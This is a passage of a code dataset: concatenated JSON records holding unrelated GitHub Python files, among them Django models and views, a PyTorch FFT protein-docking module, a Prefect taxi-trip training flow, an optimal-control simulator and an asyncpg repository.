on_delete=models.CASCADE)\n type_service = models.ForeignKey('payment_tax_service.ServiceType', on_delete=models.CASCADE)\n description = models.TextField()\n importe = models.DecimalField(max_digits=10, decimal_places=2)\n due_date = models.DateField()\n created_at = models.DateTimeField(null=True, auto_now_add=True)\n updated_at = models.DateTimeField(null=True, auto_now=True)\n\n\nclass MethodTransaction(models.Model):\n \"\"\"\n Class to save the methods of payment transaction\n Example:\n - debit_card\n - credit_card\n - cash\n \"\"\"\n name = models.CharField(max_length=20)\n active = models.BooleanField(default=True)\n created_at = models.DateTimeField(null=True, auto_now_add=True)\n updated_at = models.DateTimeField(null=True, auto_now=True)\n\n def __str__(self):\n return self.name\n\n\nclass Transactions(models.Model):\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n method_transaction = models.ForeignKey('payment_tax_service.MethodTransaction', on_delete=models.CASCADE)\n payable = models.ForeignKey('payment_tax_service.Payables', on_delete=models.CASCADE)\n number_card = models.CharField(max_length=30, editable=False, null=True, blank=True)\n importe_pago = models.DecimalField(max_digits=10, decimal_places=2)\n description = models.TextField(null=True, blank=True)\n pay_date = models.DateField()\n created_at = models.DateTimeField(null=True, auto_now_add=True)\n updated_at = models.DateTimeField(null=True, auto_now=True)\n","repo_name":"fernandohernandezpaz/desafio_backend","sub_path":"payment_tax_service/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24567966857","text":"import os\nfrom definitions import ROOT_DIR, PROFILE_FILES\nfrom log import logging\n\ndef mv_files(files_list=None):\n if files_list is None:\n files_list = PROFILE_FILES\n for i in files_list:\n old_path = os.path.join(ROOT_DIR, i)\n new_path = os.path.join(ROOT_DIR, \"myopenaps\",\"settings\",i)\n # print(\"Move:\")\n # print(old_path)\n # print(\"To:\")\n # print(new_path)\n os.replace(old_path, new_path)\n\ndef checkdir(dir):\n if not os.path.isdir(dir):\n logging.error(\"Directory not found\")\n try:\n os.makedirs(dir)\n except Exception as e:\n logging.error(\"Error occured during opening directory:\"+dir)\n logging.error(e)","repo_name":"KelvinKramp/Autotune123","sub_path":"file_management.py","file_name":"file_management.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"10198320323","text":"import datetime\nimport os\nimport uuid\n\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse, HttpResponse, Http404\nfrom django.conf import settings\nfrom django.shortcuts import get_object_or_404\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom accounts.models import UserModel\nfrom accounts.viewmodels import UserModelSerializer\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\n# Create your views here.\n\n\n@csrf_exempt\ndef fileupload(request):\n if request.method == 'POST':\n urls = []\n for filename in request.FILES:\n timestr = datetime.datetime.now().strftime('%Y/%m/%d')\n\n basepath = r'{base}/image/{timestr}'.format(timestr=timestr, base='/var/www/resource/')\n\n if not os.path.exists(basepath):\n os.makedirs(basepath)\n ext = os.path.splitext(filename)[1]\n savefilename = str(uuid.uuid4()) + ext\n\n savepath = os.path.join(basepath, savefilename)\n with open(savepath, 'wb+') as wfile:\n for chunk in request.FILES[filename].chunks():\n wfile.write(chunk)\n if ext in ['.jpg', '.png', 'jpeg']:\n from PIL import Image\n image = Image.open(savepath)\n image.save(savepath, quality=20, optimize=True)\n url = 'https://resource.lylinux.net/image/{timestr}/{filename}'.format(timestr=timestr, filename=savefilename)\n urls.append(url)\n\n return JsonResponse({\n 'code': 200,\n 'msg': '',\n 'data': urls\n })\n\n else:\n return JsonResponse({\n 'code': 404,\n 'msg': 'only for post',\n 'data': ''\n }, status=status.HTTP_404_NOT_FOUND)\n\n\ndef check_is_uuid():\n def wrapper(func):\n def check(*args, **kwargs):\n id = kwargs.get('pk')\n try:\n id = uuid.UUID(id)\n kwargs['pk'] = id\n except:\n raise Http404\n return func(*args, **kwargs)\n\n return check\n\n return wrapper\n\n\nclass UserObjectApi(APIView):\n def get_object(self, pk):\n user = get_object_or_404(UserModel, id=pk)\n return user\n\n @check_is_uuid()\n def get(self, request, pk, format=None):\n logger.info(pk)\n user = self.get_object(pk)\n serializer = UserModelSerializer(user)\n return Response(serializer.data)\n\n @check_is_uuid()\n def put(self, request, pk, format=None):\n logger.info(pk)\n user = self.get_object(pk)\n serializer = UserModelSerializer(user, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def post(self, request, format=None):\n user = UserModelSerializer(data=request.data)\n if user.is_valid():\n user.save()\n return Response(user.data, status=status.HTTP_201_CREATED)\n return Response(user.errors, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"XiaoBiaoBai/xiaobiaobai.api","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17516882190","text":"import sys\nsys.stdin = open('input.txt')\n\nT = int(input())\n\ndef check(card_list): # run, triplet 검사\n global rlt\n cnt_list = [0] * 10 # 카드 개수 cnt\n for card in card_list:\n cnt_list[card] += 1\n\n if 3 in cnt_list: # run 검사\n rlt = 1\n return\n\n for i in range(8): # triplet 검사 \n if cnt_list[i] != 0 and cnt_list[i]*cnt_list[i+1]*cnt_list[i+2] != 0: # 처음 cnt 값이 0이 아니고 뒤에도 0이 아니어아 하니까\n rlt = 1\n return\n\nfor tc in range(1, T + 1):\n arr = list(map(int, input().split()))\n player1 = []\n player2 = []\n rlt = 0\n for i in range(0, len(arr), 2): # 2씩 증가시켜 카드 2장씩 받아온다\n player1.append(arr[i])\n player2.append(arr[i+1])\n if i >= 4: # 카드가 3장 이상씩 되면 검사 한다.\n check(player1) # player1 먼저 검사\n if rlt != 0: # rlt 에 값 들어오면 둘 중 하나 검출\n rlt = 1\n break\n check(player2) # player2 검사\n if rlt != 0:\n rlt = 2\n break\n\n print(f'#{tc} {rlt}')","repo_name":"Sangtaek-Lee/Algorithm","sub_path":"problem/0329/5203/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23995752568","text":"import os\nimport multiprocessing\nfrom collections import OrderedDict\n\nimport numpy as np\nimport torch\nimport pytorch_lightning as pl\n\nfrom toil.job import Job\n\nfrom DataAugmenter import DataAugmenter, voxelize\nfrom molmimic.util.pdb import tidy\n#from molmimic.parsers.CNS import Minimize\n\ndef roll_n(X, axis, n):\n \"\"\"https://github.com/tomrunia/PyTorchSteerablePyramid/blob/0b6514d81f669b52767689a5780c88087ea2c191/steerable/math_utils.py\"\"\"\n f_idx = tuple(slice(None, None, None) if i != axis else slice(0, n, None) for i in range(X.dim()))\n b_idx = tuple(slice(None, None, None) if i != axis else slice(n, None, None) for i in range(X.dim()))\n front = X[f_idx]\n back = X[b_idx]\n return torch.cat([back, front], axis)\n\ndef batch_fftshift(x):\n real, imag = torch.unbind(x, -1)\n print(real.size(), imag.size())\n for dim in range(1, len(real.size())):\n n_shift = real.size(dim)//2\n if real.size(dim) % 2 != 0:\n n_shift += 1 # for odd-sized images\n real = roll_n(real, axis=dim, n=n_shift)\n imag = roll_n(imag, axis=dim, n=n_shift)\n return torch.stack((real, imag), -1) # last dim=2 (real&imag)\n\ndef batch_ifftshift(x):\n real, imag = torch.unbind(x, -1)\n for dim in range(len(real.size()) - 1, 0, -1):\n real = roll_n(real, axis=dim, n=real.size(dim)//2)\n imag = roll_n(imag, axis=dim, n=imag.size(dim)//2)\n return torch.stack((real, imag), -1) # last dim=2 (real&imag)\n\ndef normalize(v, eps=1e-6):\n norm=np.linalg.norm(v, ord=1)\n return v/norm if norm!=0 else v/eps\n\nclass DockPair(pl.LightningModule):\n\n def __init__(self, receptor, ligand, hparams, rfft=True):\n # init superclass\n super(DockPair, self).__init__()\n \n self.hparams = hparams\n \n self.rotation = None\n self.translation = None\n self.energy = None\n \n self.receptor = receptor\n self.ligand = ligand\n \n self.receptor_size = self.receptor.get_max_length(buffer=25)\n self.ligand_size = self.ligand.get_max_length(buffer=25)\n \n if self.ligand_size > self.receptor_size:\n #Resize receptor\n self.receptor.resize_volume(self.ligand_size)\n self.ligand.resize_volume(self.ligand_size)\n \n #Swap receptor and ligand so receptor is always largest\n ligand_ = self.ligand\n ligand_size_ = self.ligand_size\n self.ligand = self.receptor\n self.receptor = ligand_\n self.ligand_side = self.receptor_size\n self.receptor_size = ligand_size_\n else:\n #Resize ligand\n self.receptor.resize_volume(self.receptor_size)\n self.ligand.resize_volume(self.receptor_size)\n \n #Voxelize receptor\n self.receptor_volume = voxelize(self.receptor)\n \n self.rfft = rfft\n\n #Create Fourier image of receptor\n if rfft and self.receptor_volume.size()[-1] == 2:\n self.receptor_volume = self.receptor_volume[:, : , :, 0].resize(*self.receptor_volume.size()[:3])\n self.receptor_fft = torch.rfft(self.receptor_volume, 3).cpu()\n else:\n self.receptor_fft = torch.fft(self.receptor_volume, 3).cpu()\n \n #Take the complex conjugate of receptor\n self.receptor_fft = self.receptor_fft.conj()\n #self.receptor_fft[:,1] *= -1\n \n def get_complex(self):\n assert self.energy is not None\n \n def write(r, l, h, f):\n with open(f, \"w\") as complex_pdb:\n print(h, file=complex_pdb)\n for line in r:\n if not line.startswith(\"END\"):\n print(line.rstrip(), file=complex_pdb)\n for line in l:\n print(line.rstrip(), file=complex_pdb)\n \n #Rotate ligand to best orientation\n next(self.ligand.rotate(self.rotation))\n\n complex_file = \"{}_predicted_complex.pdb\".format(os.path.basename(self.receptor.path).split(\"_\")[0])\n \n receptor_pdb = self.receptor.save_pdb(file_like=True)\n ligand_pdb = self.ligand.save_pdb(file_like=True)\n \n write(receptor_pdb, ligand_pdb, \"\", complex_file+\".notrans.pdb\")\n\n #self.ligand.shift_coords(self.receptor\n self.ligand.shift_coords(self.translation, from_origin=False)\n\n header = \"REMARK Best Energy={}; Best Translation={}; \\n\".format(self.energy, self.translation)\n header += \"REMARK Best Rotation Matrix:\\n\"\n for line in str(self.rotation).splitlines():\n header += \"REMARK \"+line.rstrip()+\"\\n\"\n \n receptor_pdb = self.receptor.save_pdb(file_like=True)\n ligand_pdb = self.ligand.save_pdb(file_like=True)\n \n write(receptor_pdb, ligand_pdb, header, complex_file)\n \n self.ligand.shift_coords_to_volume_center()\n \n t2 = []\n for i in self.translation:\n if i>self.ligand.volume/2:\n t2.append(self.ligand.volume-i)\n else:\n t2.append(i)\n self.ligand.shift_coords(t2, from_origin=False)\n \n receptor_pdb = self.receptor.save_pdb(file_like=True)\n ligand_pdb = self.ligand.save_pdb(file_like=True)\n \n write(receptor_pdb, ligand_pdb, header, complex_file+\".shift.pdb\")\n \n self.ligand.shift_coords_to_volume_center()\n \n t2 = []\n for i in self.translation:\n t2.append(self.ligand.volume-i)\n self.ligand.shift_coords(t2, from_origin=False)\n \n receptor_pdb = self.receptor.save_pdb(file_like=True)\n ligand_pdb = self.ligand.save_pdb(file_like=True)\n \n write(receptor_pdb, ligand_pdb, header, complex_file+\".shift2.pdb\")\n \n self.ligand.shift_coords_to_volume_center()\n \n t2 = []\n for i in self.translation:\n t2.append(self.ligand.volume/2-i)\n self.ligand.shift_coords(t2, from_origin=False)\n \n receptor_pdb = self.receptor.save_pdb(file_like=True)\n ligand_pdb = self.ligand.save_pdb(file_like=True)\n \n write(receptor_pdb, ligand_pdb, header, complex_file+\".shift3.pdb\")\n \n self.ligand.shift_coords_to_volume_center()\n \n t2 = np.array(self.translation)-np.array([self.ligand.volume/2]*3)\n self.ligand.shift_coords(t2, from_origin=False)\n \n receptor_pdb = self.receptor.save_pdb(file_like=True)\n ligand_pdb = self.ligand.save_pdb(file_like=True)\n \n write(receptor_pdb, ligand_pdb, header, complex_file+\".shift4.pdb\")\n \n self.ligand.shift_coords_to_volume_center()\n \n self.ligand.shift_coords(self.translation, from_origin=True)\n \n receptor_pdb = self.receptor.save_pdb(file_like=True)\n ligand_pdb = self.ligand.save_pdb(file_like=True)\n \n write(receptor_pdb, ligand_pdb, header, complex_file+\".shift4.pdb\")\n \n \n #Minimize using CNS\n #complex_file, cns_results = Minimize(complex_file, work_dir=os.dirname(self.receptor.path), job=Job())\n\n print(list(self.receptor.structure.get_chains()), list(self.ligand.structure.get_chains()))\n\n def forward(self, rvs, ligand_volumes, shift=False):\n #Create Fourier image of ligand\n if self.rfft and ligand_volumes.size()[-1] == 2:\n ligand_volumes = ligand_volumes[:, :, : , :, 0].resize(*ligand_volumes.size()[:-1])\n ligand_fft = torch.rfft(ligand_volumes, 3)\n else:\n ligand_fft = torch.fft(ligand_volumes, 3)\n \n #Create Fourier image of rotated ligand\n #ligand_fft = torch.fft(ligand_volumes, 3)\n \n #Calculate energy using the convolution thm and correlation\n if self.rfft:\n energy = torch.irfft(self.receptor_fft.to(ligand_fft.device)*ligand_fft, 3)\n else:\n energy = torch.ifft(self.receptor_fft.to(ligand_fft.device)*ligand_fft, 3)\n \n if shift:\n energy = batch_ifftshift(energy)\n\n energy = energy[:, :, :, 0]\n \n print(energy)\n print(energy.size())\n\n #energy = energy.reshape(energy.size()[:-1])\n \n #Get index with lowest energy, \n maxval_z, ind_z = torch.max(energy, dim=3, keepdim=False)\n maxval_y, ind_y = torch.max(maxval_z, dim=2)\n maxval_x, ind_x = torch.max(maxval_y, dim=1)\n maxval_batch, ind_batch = torch.max(maxval_x, dim=0)\n \n #print(ind_x)\n \n batch = ind_batch.item()\n x = ind_x[batch].item()\n y = ind_y[batch, x].item()\n z = ind_z[batch, x, y].item()\n \n translation = (x, y, z)\n rotation = rvs[batch]\n low_energy = energy[batch, x, y, z]\n \n return translation, rotation, low_energy\n\n def training_step(self, batch, batch_num):\n rvs, volumes = batch\n translation, rotation, energy = self.forward(rvs, volumes)\n \n #return translation, rotation, energy\n \n if self.energy is None or energy>self.energy:\n self.rotation = rotation\n self.translation = translation\n self.energy = energy\n \n tqdm_dict = {'loss': energy.item(), 'energy': self.energy, \"translation\":translation}\n output = OrderedDict({\n 'loss': energy,\n 'progress_bar': tqdm_dict,\n 'log': {'loss': energy.item(), 'energy': self.energy}\n })\n return output\n \n def test_step(self, batch, batch_num):\n return self.training_step(batch, batch_num)\n \n def test_step_end(self, batch):\n print(batch)\n return batch\n \n def backward(self, closure_loss, optimizer, opt_idx):\n return\n \n def optimizer_step(self, current_epoch, batch_nb, optimizer, optimizer_i,\n second_order_closure=None):\n return\n\n# def training_end(self, batch):\n# print(batch)\n# print(batch[0][2])\n# translation, rotation, energy = min(batch, key=lambda b: b[2]) \n \n# if self.energy is None or energy= 1) & (df.duration <= 60)].copy()\n\n mean_duration = df.duration.mean()\n if train:\n logger.info(\"The mean duration of training is %f\", mean_duration)\n else:\n logger.info(\"The mean duration of validation is %f\", mean_duration)\n\n df[categorical] = df[categorical].fillna(-1).astype('int').astype('str')\n return df\n\n\n@prefect.task\ndef train_model(df, categorical):\n logger = prefect.get_run_logger()\n\n train_dicts = df[categorical].to_dict(orient='records')\n dv = DictVectorizer()\n X_train = dv.fit_transform(train_dicts)\n y_train = df.duration.values\n\n logger.info(f\"The shape of X_train is %s\", X_train.shape)\n logger.info(f\"The DictVectorizer has %d features\", len(dv.feature_names_))\n\n lr = LinearRegression()\n lr.fit(X_train, y_train)\n y_pred = lr.predict(X_train)\n mse = mean_squared_error(y_train, y_pred, squared=False)\n logger.info(f\"The MSE of training is: %f\", mse)\n return lr, dv\n\n\n@prefect.task\ndef run_model(df, categorical, dv, lr):\n logger = prefect.get_run_logger()\n\n val_dicts = df[categorical].to_dict(orient='records')\n X_val = dv.transform(val_dicts)\n y_pred = lr.predict(X_val)\n y_val = df.duration.values\n\n mse = mean_squared_error(y_val, y_pred, squared=False)\n logger.info(f\"The MSE of validation is: %f\", mse)\n return\n\n\ndef _string_to_date(date: str) -> datetime.date:\n return datetime.strptime(date, \"%Y-%m-%d\").date()\n\n\ndef _date_to_string(date: datetime.date) -> str:\n return date.strftime(\"%Y-%m\")\n\n\ndef _ensure_data_exists(path: Path):\n if path.exists():\n return\n\n response = requests.get(f\"https://nyc-tlc.s3.amazonaws.com/trip+data/{path.stem}.parquet\", verify=False)\n response.raise_for_status()\n\n with path.open(\"wb\") as file:\n file.write(response.content)\n\n\n@prefect.task\ndef get_paths(date: Optional[str] = None, date_folder: Path = Path(\"./data\")):\n logger = prefect.get_run_logger()\n\n if date is None:\n date = datetime.now().date()\n else:\n date = _string_to_date(date)\n\n train_date = date - relativedelta(months=2)\n val_date = date - relativedelta(months=1)\n\n train_path = date_folder / f\"fhv_tripdata_{_date_to_string(train_date)}.parquet\"\n val_path = date_folder / f\"fhv_tripdata_{_date_to_string(val_date)}.parquet\"\n\n logger.info(\"Train path %s\", train_path)\n logger.info(\"Val path %s\", val_path)\n\n _ensure_data_exists(train_path)\n _ensure_data_exists(val_path)\n\n return train_path, val_path\n\n\ndef _save_to_bin(obj: Any, path: Path):\n with path.open('wb') as file:\n pickle.dump(obj, file)\n\n\n@prefect.flow\ndef main(date: Optional[str] = None):\n train_path, val_path = get_paths(date).result()\n\n categorical = ['PUlocationID', 'DOlocationID']\n\n df_train = read_data(train_path)\n df_train_processed = prepare_features(df_train, categorical)\n\n df_val = read_data(val_path)\n df_val_processed = prepare_features(df_val, categorical, False)\n\n # train the model\n lr, dv = train_model(df_train_processed, categorical).result()\n run_model(df_val_processed, categorical, dv, lr)\n\n _save_to_bin(lr, Path(\"./artifacts\") / f\"model-{date}.bin\")\n _save_to_bin(dv, Path(\"./artifacts\") / f\"dv-{date}.bin\")\n\n\nDeploymentSpec(\n name=\"cron-schedule-deployment\",\n flow=main,\n schedule=CronSchedule(\n cron=\"0 9 15 * *\",\n ),\n flow_runner=SubprocessFlowRunner(),\n)\n\n\n# main(date=\"2021-08-15\")\n","repo_name":"LiableFish/mlops-zoomcamp","sub_path":"03-orchestration/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25250589323","text":"from abc import ABC, abstractmethod\nimport numpy\n\n\nclass UnstableClosedLoopSystemError(Exception):\n \"\"\"UnstableClosedLoopSystemError\n\n This error is raised if the computed K and L do not lead to a stable system (ie A-B@L or A - K@C have poles with positive real values).\n\n \"\"\"\n\n pass\n\n\nclass SOFCStepper(ABC):\n def __init__(\n self, A, B, H, Q, R, U, K, L, Ac=None, Bc=None, Hc=None, seed=None, **kwargs\n ):\n \"\"\"dx = (A @ x + B @ u)dt + Fx dnoise + Yu dnoise + G dnoise\n dy = H @ x*dt + D @ u*dt\n dxhat = (A_c @ xhat + B_c @ u)dt + K @ (dy - H_c @ xhat * dt)\n u = -L @ xhat\n\n costs: x.T @ Q @ x + u.T @ R @ u + (x-xhat).T @ U @ (x-xhat)\n\n \"\"\"\n\n self.x = None\n\n self.A = A\n self.B = B\n self.H = H\n self.Q = Q\n self.R = R\n self.U = U\n self.K = K\n self.L = L\n\n self.Ac = A if Ac is None else Ac\n self.Bc = B if Bc is None else Bc\n self.Hc = H if Hc is None else Hc\n\n self.rng = numpy.random.default_rng(seed=seed)\n\n def reset(self, timestep, simulation_time, x_init=None, n_trials=20):\n # initializes\n self.timestep = timestep\n self.simulation_time = simulation_time\n self.n_trials = n_trials\n TF = simulation_time # alias\n\n time = [-timestep] + numpy.arange(0, TF, timestep).tolist()\n self.time = time\n\n # Mov.shape = (#timesteps, #trials, state, x or xhat)\n Mov = numpy.zeros((len(time), n_trials, self.A.shape[0], 2))\n if x_init is None:\n x_init = numpy.zeros((self.A.shape[0],))\n x_init[0] = self.rng.random()\n Mov[0, :, :, 0] = x_init # initialize x\n Mov[0, :, :, 1] = x_init # initialize xhat\n self.Mov = Mov\n self.u = numpy.zeros((len(time) - 1, n_trials, self.B.shape[1]))\n self.cost = numpy.zeros((n_trials,))\n\n @abstractmethod\n def step(self, x, xhat, noise=True):\n pass\n\n def simulate(self, noise=True):\n for nt in range(self.n_trials):\n for i, t in enumerate(self.time[1:]):\n x, xhat = self.Mov[i, nt, :, 0].reshape(-1, 1), self.Mov[\n i, nt, :, 1\n ].reshape(-1, 1)\n step_result = self.step(x, xhat, noise=noise)\n dx, d_hat_x, u = (\n step_result[\"dx\"],\n step_result[\"dxhat\"],\n step_result[\"u\"],\n )\n self.Mov[i + 1, nt, :, 0] = (x + dx).reshape(1, -1)\n self.Mov[i + 1, nt, :, 1] = (xhat + d_hat_x).reshape(1, -1)\n self.u[i, nt, :] = u.squeeze()\n self.cost[nt] += step_result[\"cost\"]\n\n return self.Mov, self.u, self.cost\n","repo_name":"jgori-ouistiti/pointing_utils","sub_path":"pointing_utils/optimal_control/SOFCstepper.py","file_name":"SOFCstepper.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29706953440","text":"from django.http import JsonResponse\nfrom django.shortcuts import render\n\n\ndef chart_list(request):\n return render(request, 'chart_list.html')\n\n\ndef chart_bar(request):\n legend = []\n x_axis = []\n series_list = []\n result = {\n 'status': True,\n \"data\": {\n 'legend': legend,\n \"series_list\": series_list,\n \"x_axis\": x_axis\n }\n }\n return JsonResponse(result)\n\n\ndef chart_pie(request):\n db_data_list = [{'value': 1048, 'name': 'IT部门'},\n {'value': 735, 'name': '运营部门'},\n {'value': 580, 'name': '新媒体部门'},\n {'value': 484, 'name': '广告部门'}, ]\n result = {\n 'status': True,\n \"data\": db_data_list\n }\n return JsonResponse(result)\n\n\ndef chart_line(request):\n x_axis = {\"data\": ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']}\n\n series_list = {\"data\": [150, 230, 224, 218, 135, 147, 260]}\n result = {\n 'status': True,\n \"series_list\": series_list,\n \"x_axis\": x_axis\n }\n return JsonResponse(result)\n","repo_name":"benben555/djangoProject","sub_path":"exp1/webapp/views/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38703849430","text":"from typing import Optional\n\nfrom asyncpg import Connection\nfrom asyncpg import Record\n\nfrom app.core.config import get_app_settings\nfrom app.db.errors import EntityDoesNotExist\nfrom app.db.queries.queries import queries\nfrom app.db.repositories.base import BaseRepository\nfrom app.db.repositories.comments import CommentsRepository\nfrom app.db.repositories.users import UsersRepository\nfrom app.models.domain.posts import Post\nfrom app.models.domain.posts import PostWithComments\nfrom app.models.domain.posts import PostWithWalletAddress\nfrom app.models.schemas.posts import PostListResponse\n\nSETTINGS = get_app_settings()\n\n\nclass PostsRepository(BaseRepository):\n def __init__(self, conn: Connection) -> None:\n super().__init__(conn)\n self._users_repo = UsersRepository(conn)\n self._comments_repo = CommentsRepository(conn)\n\n async def get_post_by_id(self, *, id: int) -> PostWithWalletAddress:\n post_row = await queries.get_post_by_id(self.connection, id=id)\n\n if post_row:\n return await self._get_post_from_db_record(post_row=post_row)\n\n raise EntityDoesNotExist(f\"post with id {id} does not exist\")\n\n async def get_post_list(\n self,\n *,\n limit: int = 100,\n comments_limit: int = 3,\n offset: int = 0,\n store_id: Optional[int] = None,\n user_id: Optional[int] = None,\n is_public: Optional[bool] = None,\n ) -> PostListResponse:\n if store_id is not None:\n post_rows = await queries.get_posts_by_store_id(\n self.connection, limit=limit, offset=offset, store_id=store_id\n )\n elif is_public:\n post_rows = await queries.get_latest_posts(\n self.connection, limit=limit, offset=offset\n )\n else:\n post_rows = await queries.get_posts_by_user_id(\n self.connection, limit=limit, offset=offset, user_id=user_id\n )\n\n total = (\n await self._get_post_list_total_from_db_record(post_row=post_rows[0])\n if post_rows\n else 0\n )\n\n post_list = [\n await self._get_post_from_db_for_list_record(\n post_row=post_row, comments_limit=comments_limit\n )\n for post_row in post_rows\n ]\n\n return PostListResponse(posts=post_list, total=total)\n\n async def _get_post_from_db_record(self, *, post_row: Record) -> Post:\n user_id = post_row[\"user_id\"]\n user_info = (\n await self._users_repo.get_user_by_id(id=user_id)\n if user_id is not None\n else None\n )\n\n return Post(\n id_=post_row[\"id\"],\n store_id=post_row[\"store_id\"],\n user_id=user_id,\n user_wallet_address=user_info.wallet_address\n if user_info and user_info.wallet_address is not None\n else \"訪客\",\n user_image=user_info.image if user_info else None,\n body=post_row[\"body\"],\n image_url=post_row[\"image_url\"],\n rating=post_row[\"rating\"],\n status=post_row[\"status\"],\n created_at=post_row[\"created_at\"],\n updated_at=post_row[\"updated_at\"],\n )\n\n async def _get_post_from_db_for_list_record(\n self, *, post_row: Record, comments_limit: int\n ) -> PostWithComments:\n user_id = post_row[\"user_id\"]\n post_id = post_row[\"id\"]\n\n user_info = await self._users_repo.get_user_by_id(id=user_id)\n\n comments = await self._comments_repo.get_comment_list(\n post_id=post_id, limit=comments_limit\n )\n\n return PostWithComments(\n id_=post_id,\n store_id=post_row[\"store_id\"],\n user_id=user_id,\n user_wallet_address=user_info.wallet_address\n if user_info and user_info.wallet_address is not None\n else \"訪客\",\n user_image=user_info.image if user_info else None,\n body=post_row[\"body\"],\n image_url=post_row[\"image_url\"],\n rating=post_row[\"rating\"],\n comments=comments.comments,\n status=post_row[\"status\"],\n created_at=post_row[\"created_at\"],\n updated_at=post_row[\"updated_at\"],\n )\n\n async def _get_post_list_total_from_db_record(self, *, post_row: Record) -> int:\n return post_row[\"total\"]\n\n async def create_new_post(\n self,\n *,\n store_id: int,\n user_id: int,\n body: Optional[str] = None,\n image_url: Optional[str] = None,\n rating: Optional[float] = None,\n status: int = 1,\n ) -> Post:\n new_post = Post(\n store_id=store_id,\n user_id=user_id,\n body=body,\n image_url=image_url,\n rating=rating,\n status=status,\n )\n\n async with self.connection.transaction():\n post_row = await queries.create_post(\n self.connection,\n store_id=store_id,\n user_id=user_id,\n body=body,\n image_url=image_url,\n rating=rating,\n status=status,\n )\n\n return new_post.copy(update=dict(post_row))\n\n async def update_post(\n self,\n *,\n post_in_db: PostWithWalletAddress,\n body: Optional[str] = None,\n image_url: Optional[str] = None,\n rating: Optional[float] = None,\n status: Optional[int] = None,\n ) -> PostWithWalletAddress:\n post_in_db.body = body or post_in_db.body\n post_in_db.image_url = image_url or post_in_db.image_url\n post_in_db.rating = rating if rating is not None else post_in_db.rating\n post_in_db.status = status if status is not None else post_in_db.status\n\n async with self.connection.transaction():\n post_in_db.updated_at = await queries.update_post_by_id(\n self.connection,\n id=post_in_db.id_,\n new_body=post_in_db.body,\n new_image_url=post_in_db.image_url,\n new_rating=post_in_db.rating,\n new_status=post_in_db.status,\n )\n\n return post_in_db\n","repo_name":"world-of-ramen/ramen-backend","sub_path":"app/db/repositories/posts.py","file_name":"posts.py","file_ext":"py","file_size_in_byte":6243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31911779657","text":"#view functions takes a Web request and returns a Web response\n#houses most of the algorithm / logic\n\nfrom django.shortcuts import render\nfrom django.core import serializers\nfrom django.http import JsonResponse\n\nfrom .models import approvals\nfrom .serializers import ApprovalsSerializer\nfrom .forms import ApprovalForm\n\nfrom rest_framework import viewsets\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.parsers import JSONParser\n\nfrom sklearn import preprocessing\nfrom sklearn.externals import joblib\n\nimport numpy as np \nimport pandas as pd \nimport pickle \nimport json\nimport tensorflow.keras\n\n# from .loan_model import calculate\n\nclass ApprovalsView(viewsets.ModelViewSet):\n\tqueryset = approvals.objects.all()\n\tserializer_class = ApprovalsSerializer\n\ndef approvereject(unit):\n\ttry:\n\t\tmdl = joblib.load('C:/Users/Hudson Yuen/OneDrive/edits/loan_approval/loan_model.pkl')\n\t\tscalers = joblib.load('C:/Users/Hudson Yuen/OneDrive/edits/loan_approval/scaler.pkl')\n\n\t\t# data = request.data\n\t\t# unit = np.array(list(data.values))\n\t\t# unit = unit.reshape(-1, 1)\n\n\t\tX = scalers.transform(unit)\n\t\ty_pred = mdl.predict(X)\n\t\ty_pred = (y_pred > 0.55)\n\n\t\tdf = pd.DataFrame(y_pred, columns = ['Status'])\n\t\tdf = df.replace({True: 'Approved', False: 'Rejected'})\n\t\treturn JsonResponse('Your loan status is: {}'.format(df), safe = False)\n\t\n\texcept ValueError as e:\n\t\treturn Response(e.args[0], status.HTTP_400_BAD_REQUEST)\n\ndef ohevalue(df):\n\tohe_col = joblib.load('C:/Users/Hudson Yuen/OneDrive/edits/loan_approval/ohe_col.pkl')\n\tcat_columns = ['Gender', 'Married', 'Graduated', 'Self_Employed', 'Property_Area']\n\tdf_processed = pd.get_dummies(df, columns = cat_columns)\n\n\tnew_dict = {}\n\tfor i in ohe_col:\n\t\tif i in df_processed.columns:\n\t\t\tnew_dict[i] = df_processed[i].values\n\t\telse:\n\t\t\tnew_dict[i] = 0\n\n\tnew_df = pd.DataFrame(new_dict)\n\treturn new_df\n\ndef userform(request):\n\tif request.method == 'POST':\n\t\tform = ApprovalForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tfirst_name = form.cleaned_data['first_name']\n\t\t\tlast_name = form.cleaned_data['last_name']\n\t\t\tDependents = form.cleaned_data['Dependents']\n\t\t\tApplicantIncome = form.cleaned_data['ApplicantIncome']\n\t\t\tCoapplicantIncome = form.cleaned_data['CoapplicantIncome']\n\t\t\tLoanAmount = form.cleaned_data['LoanAmount']\n\t\t\tLoan_Amount_Term 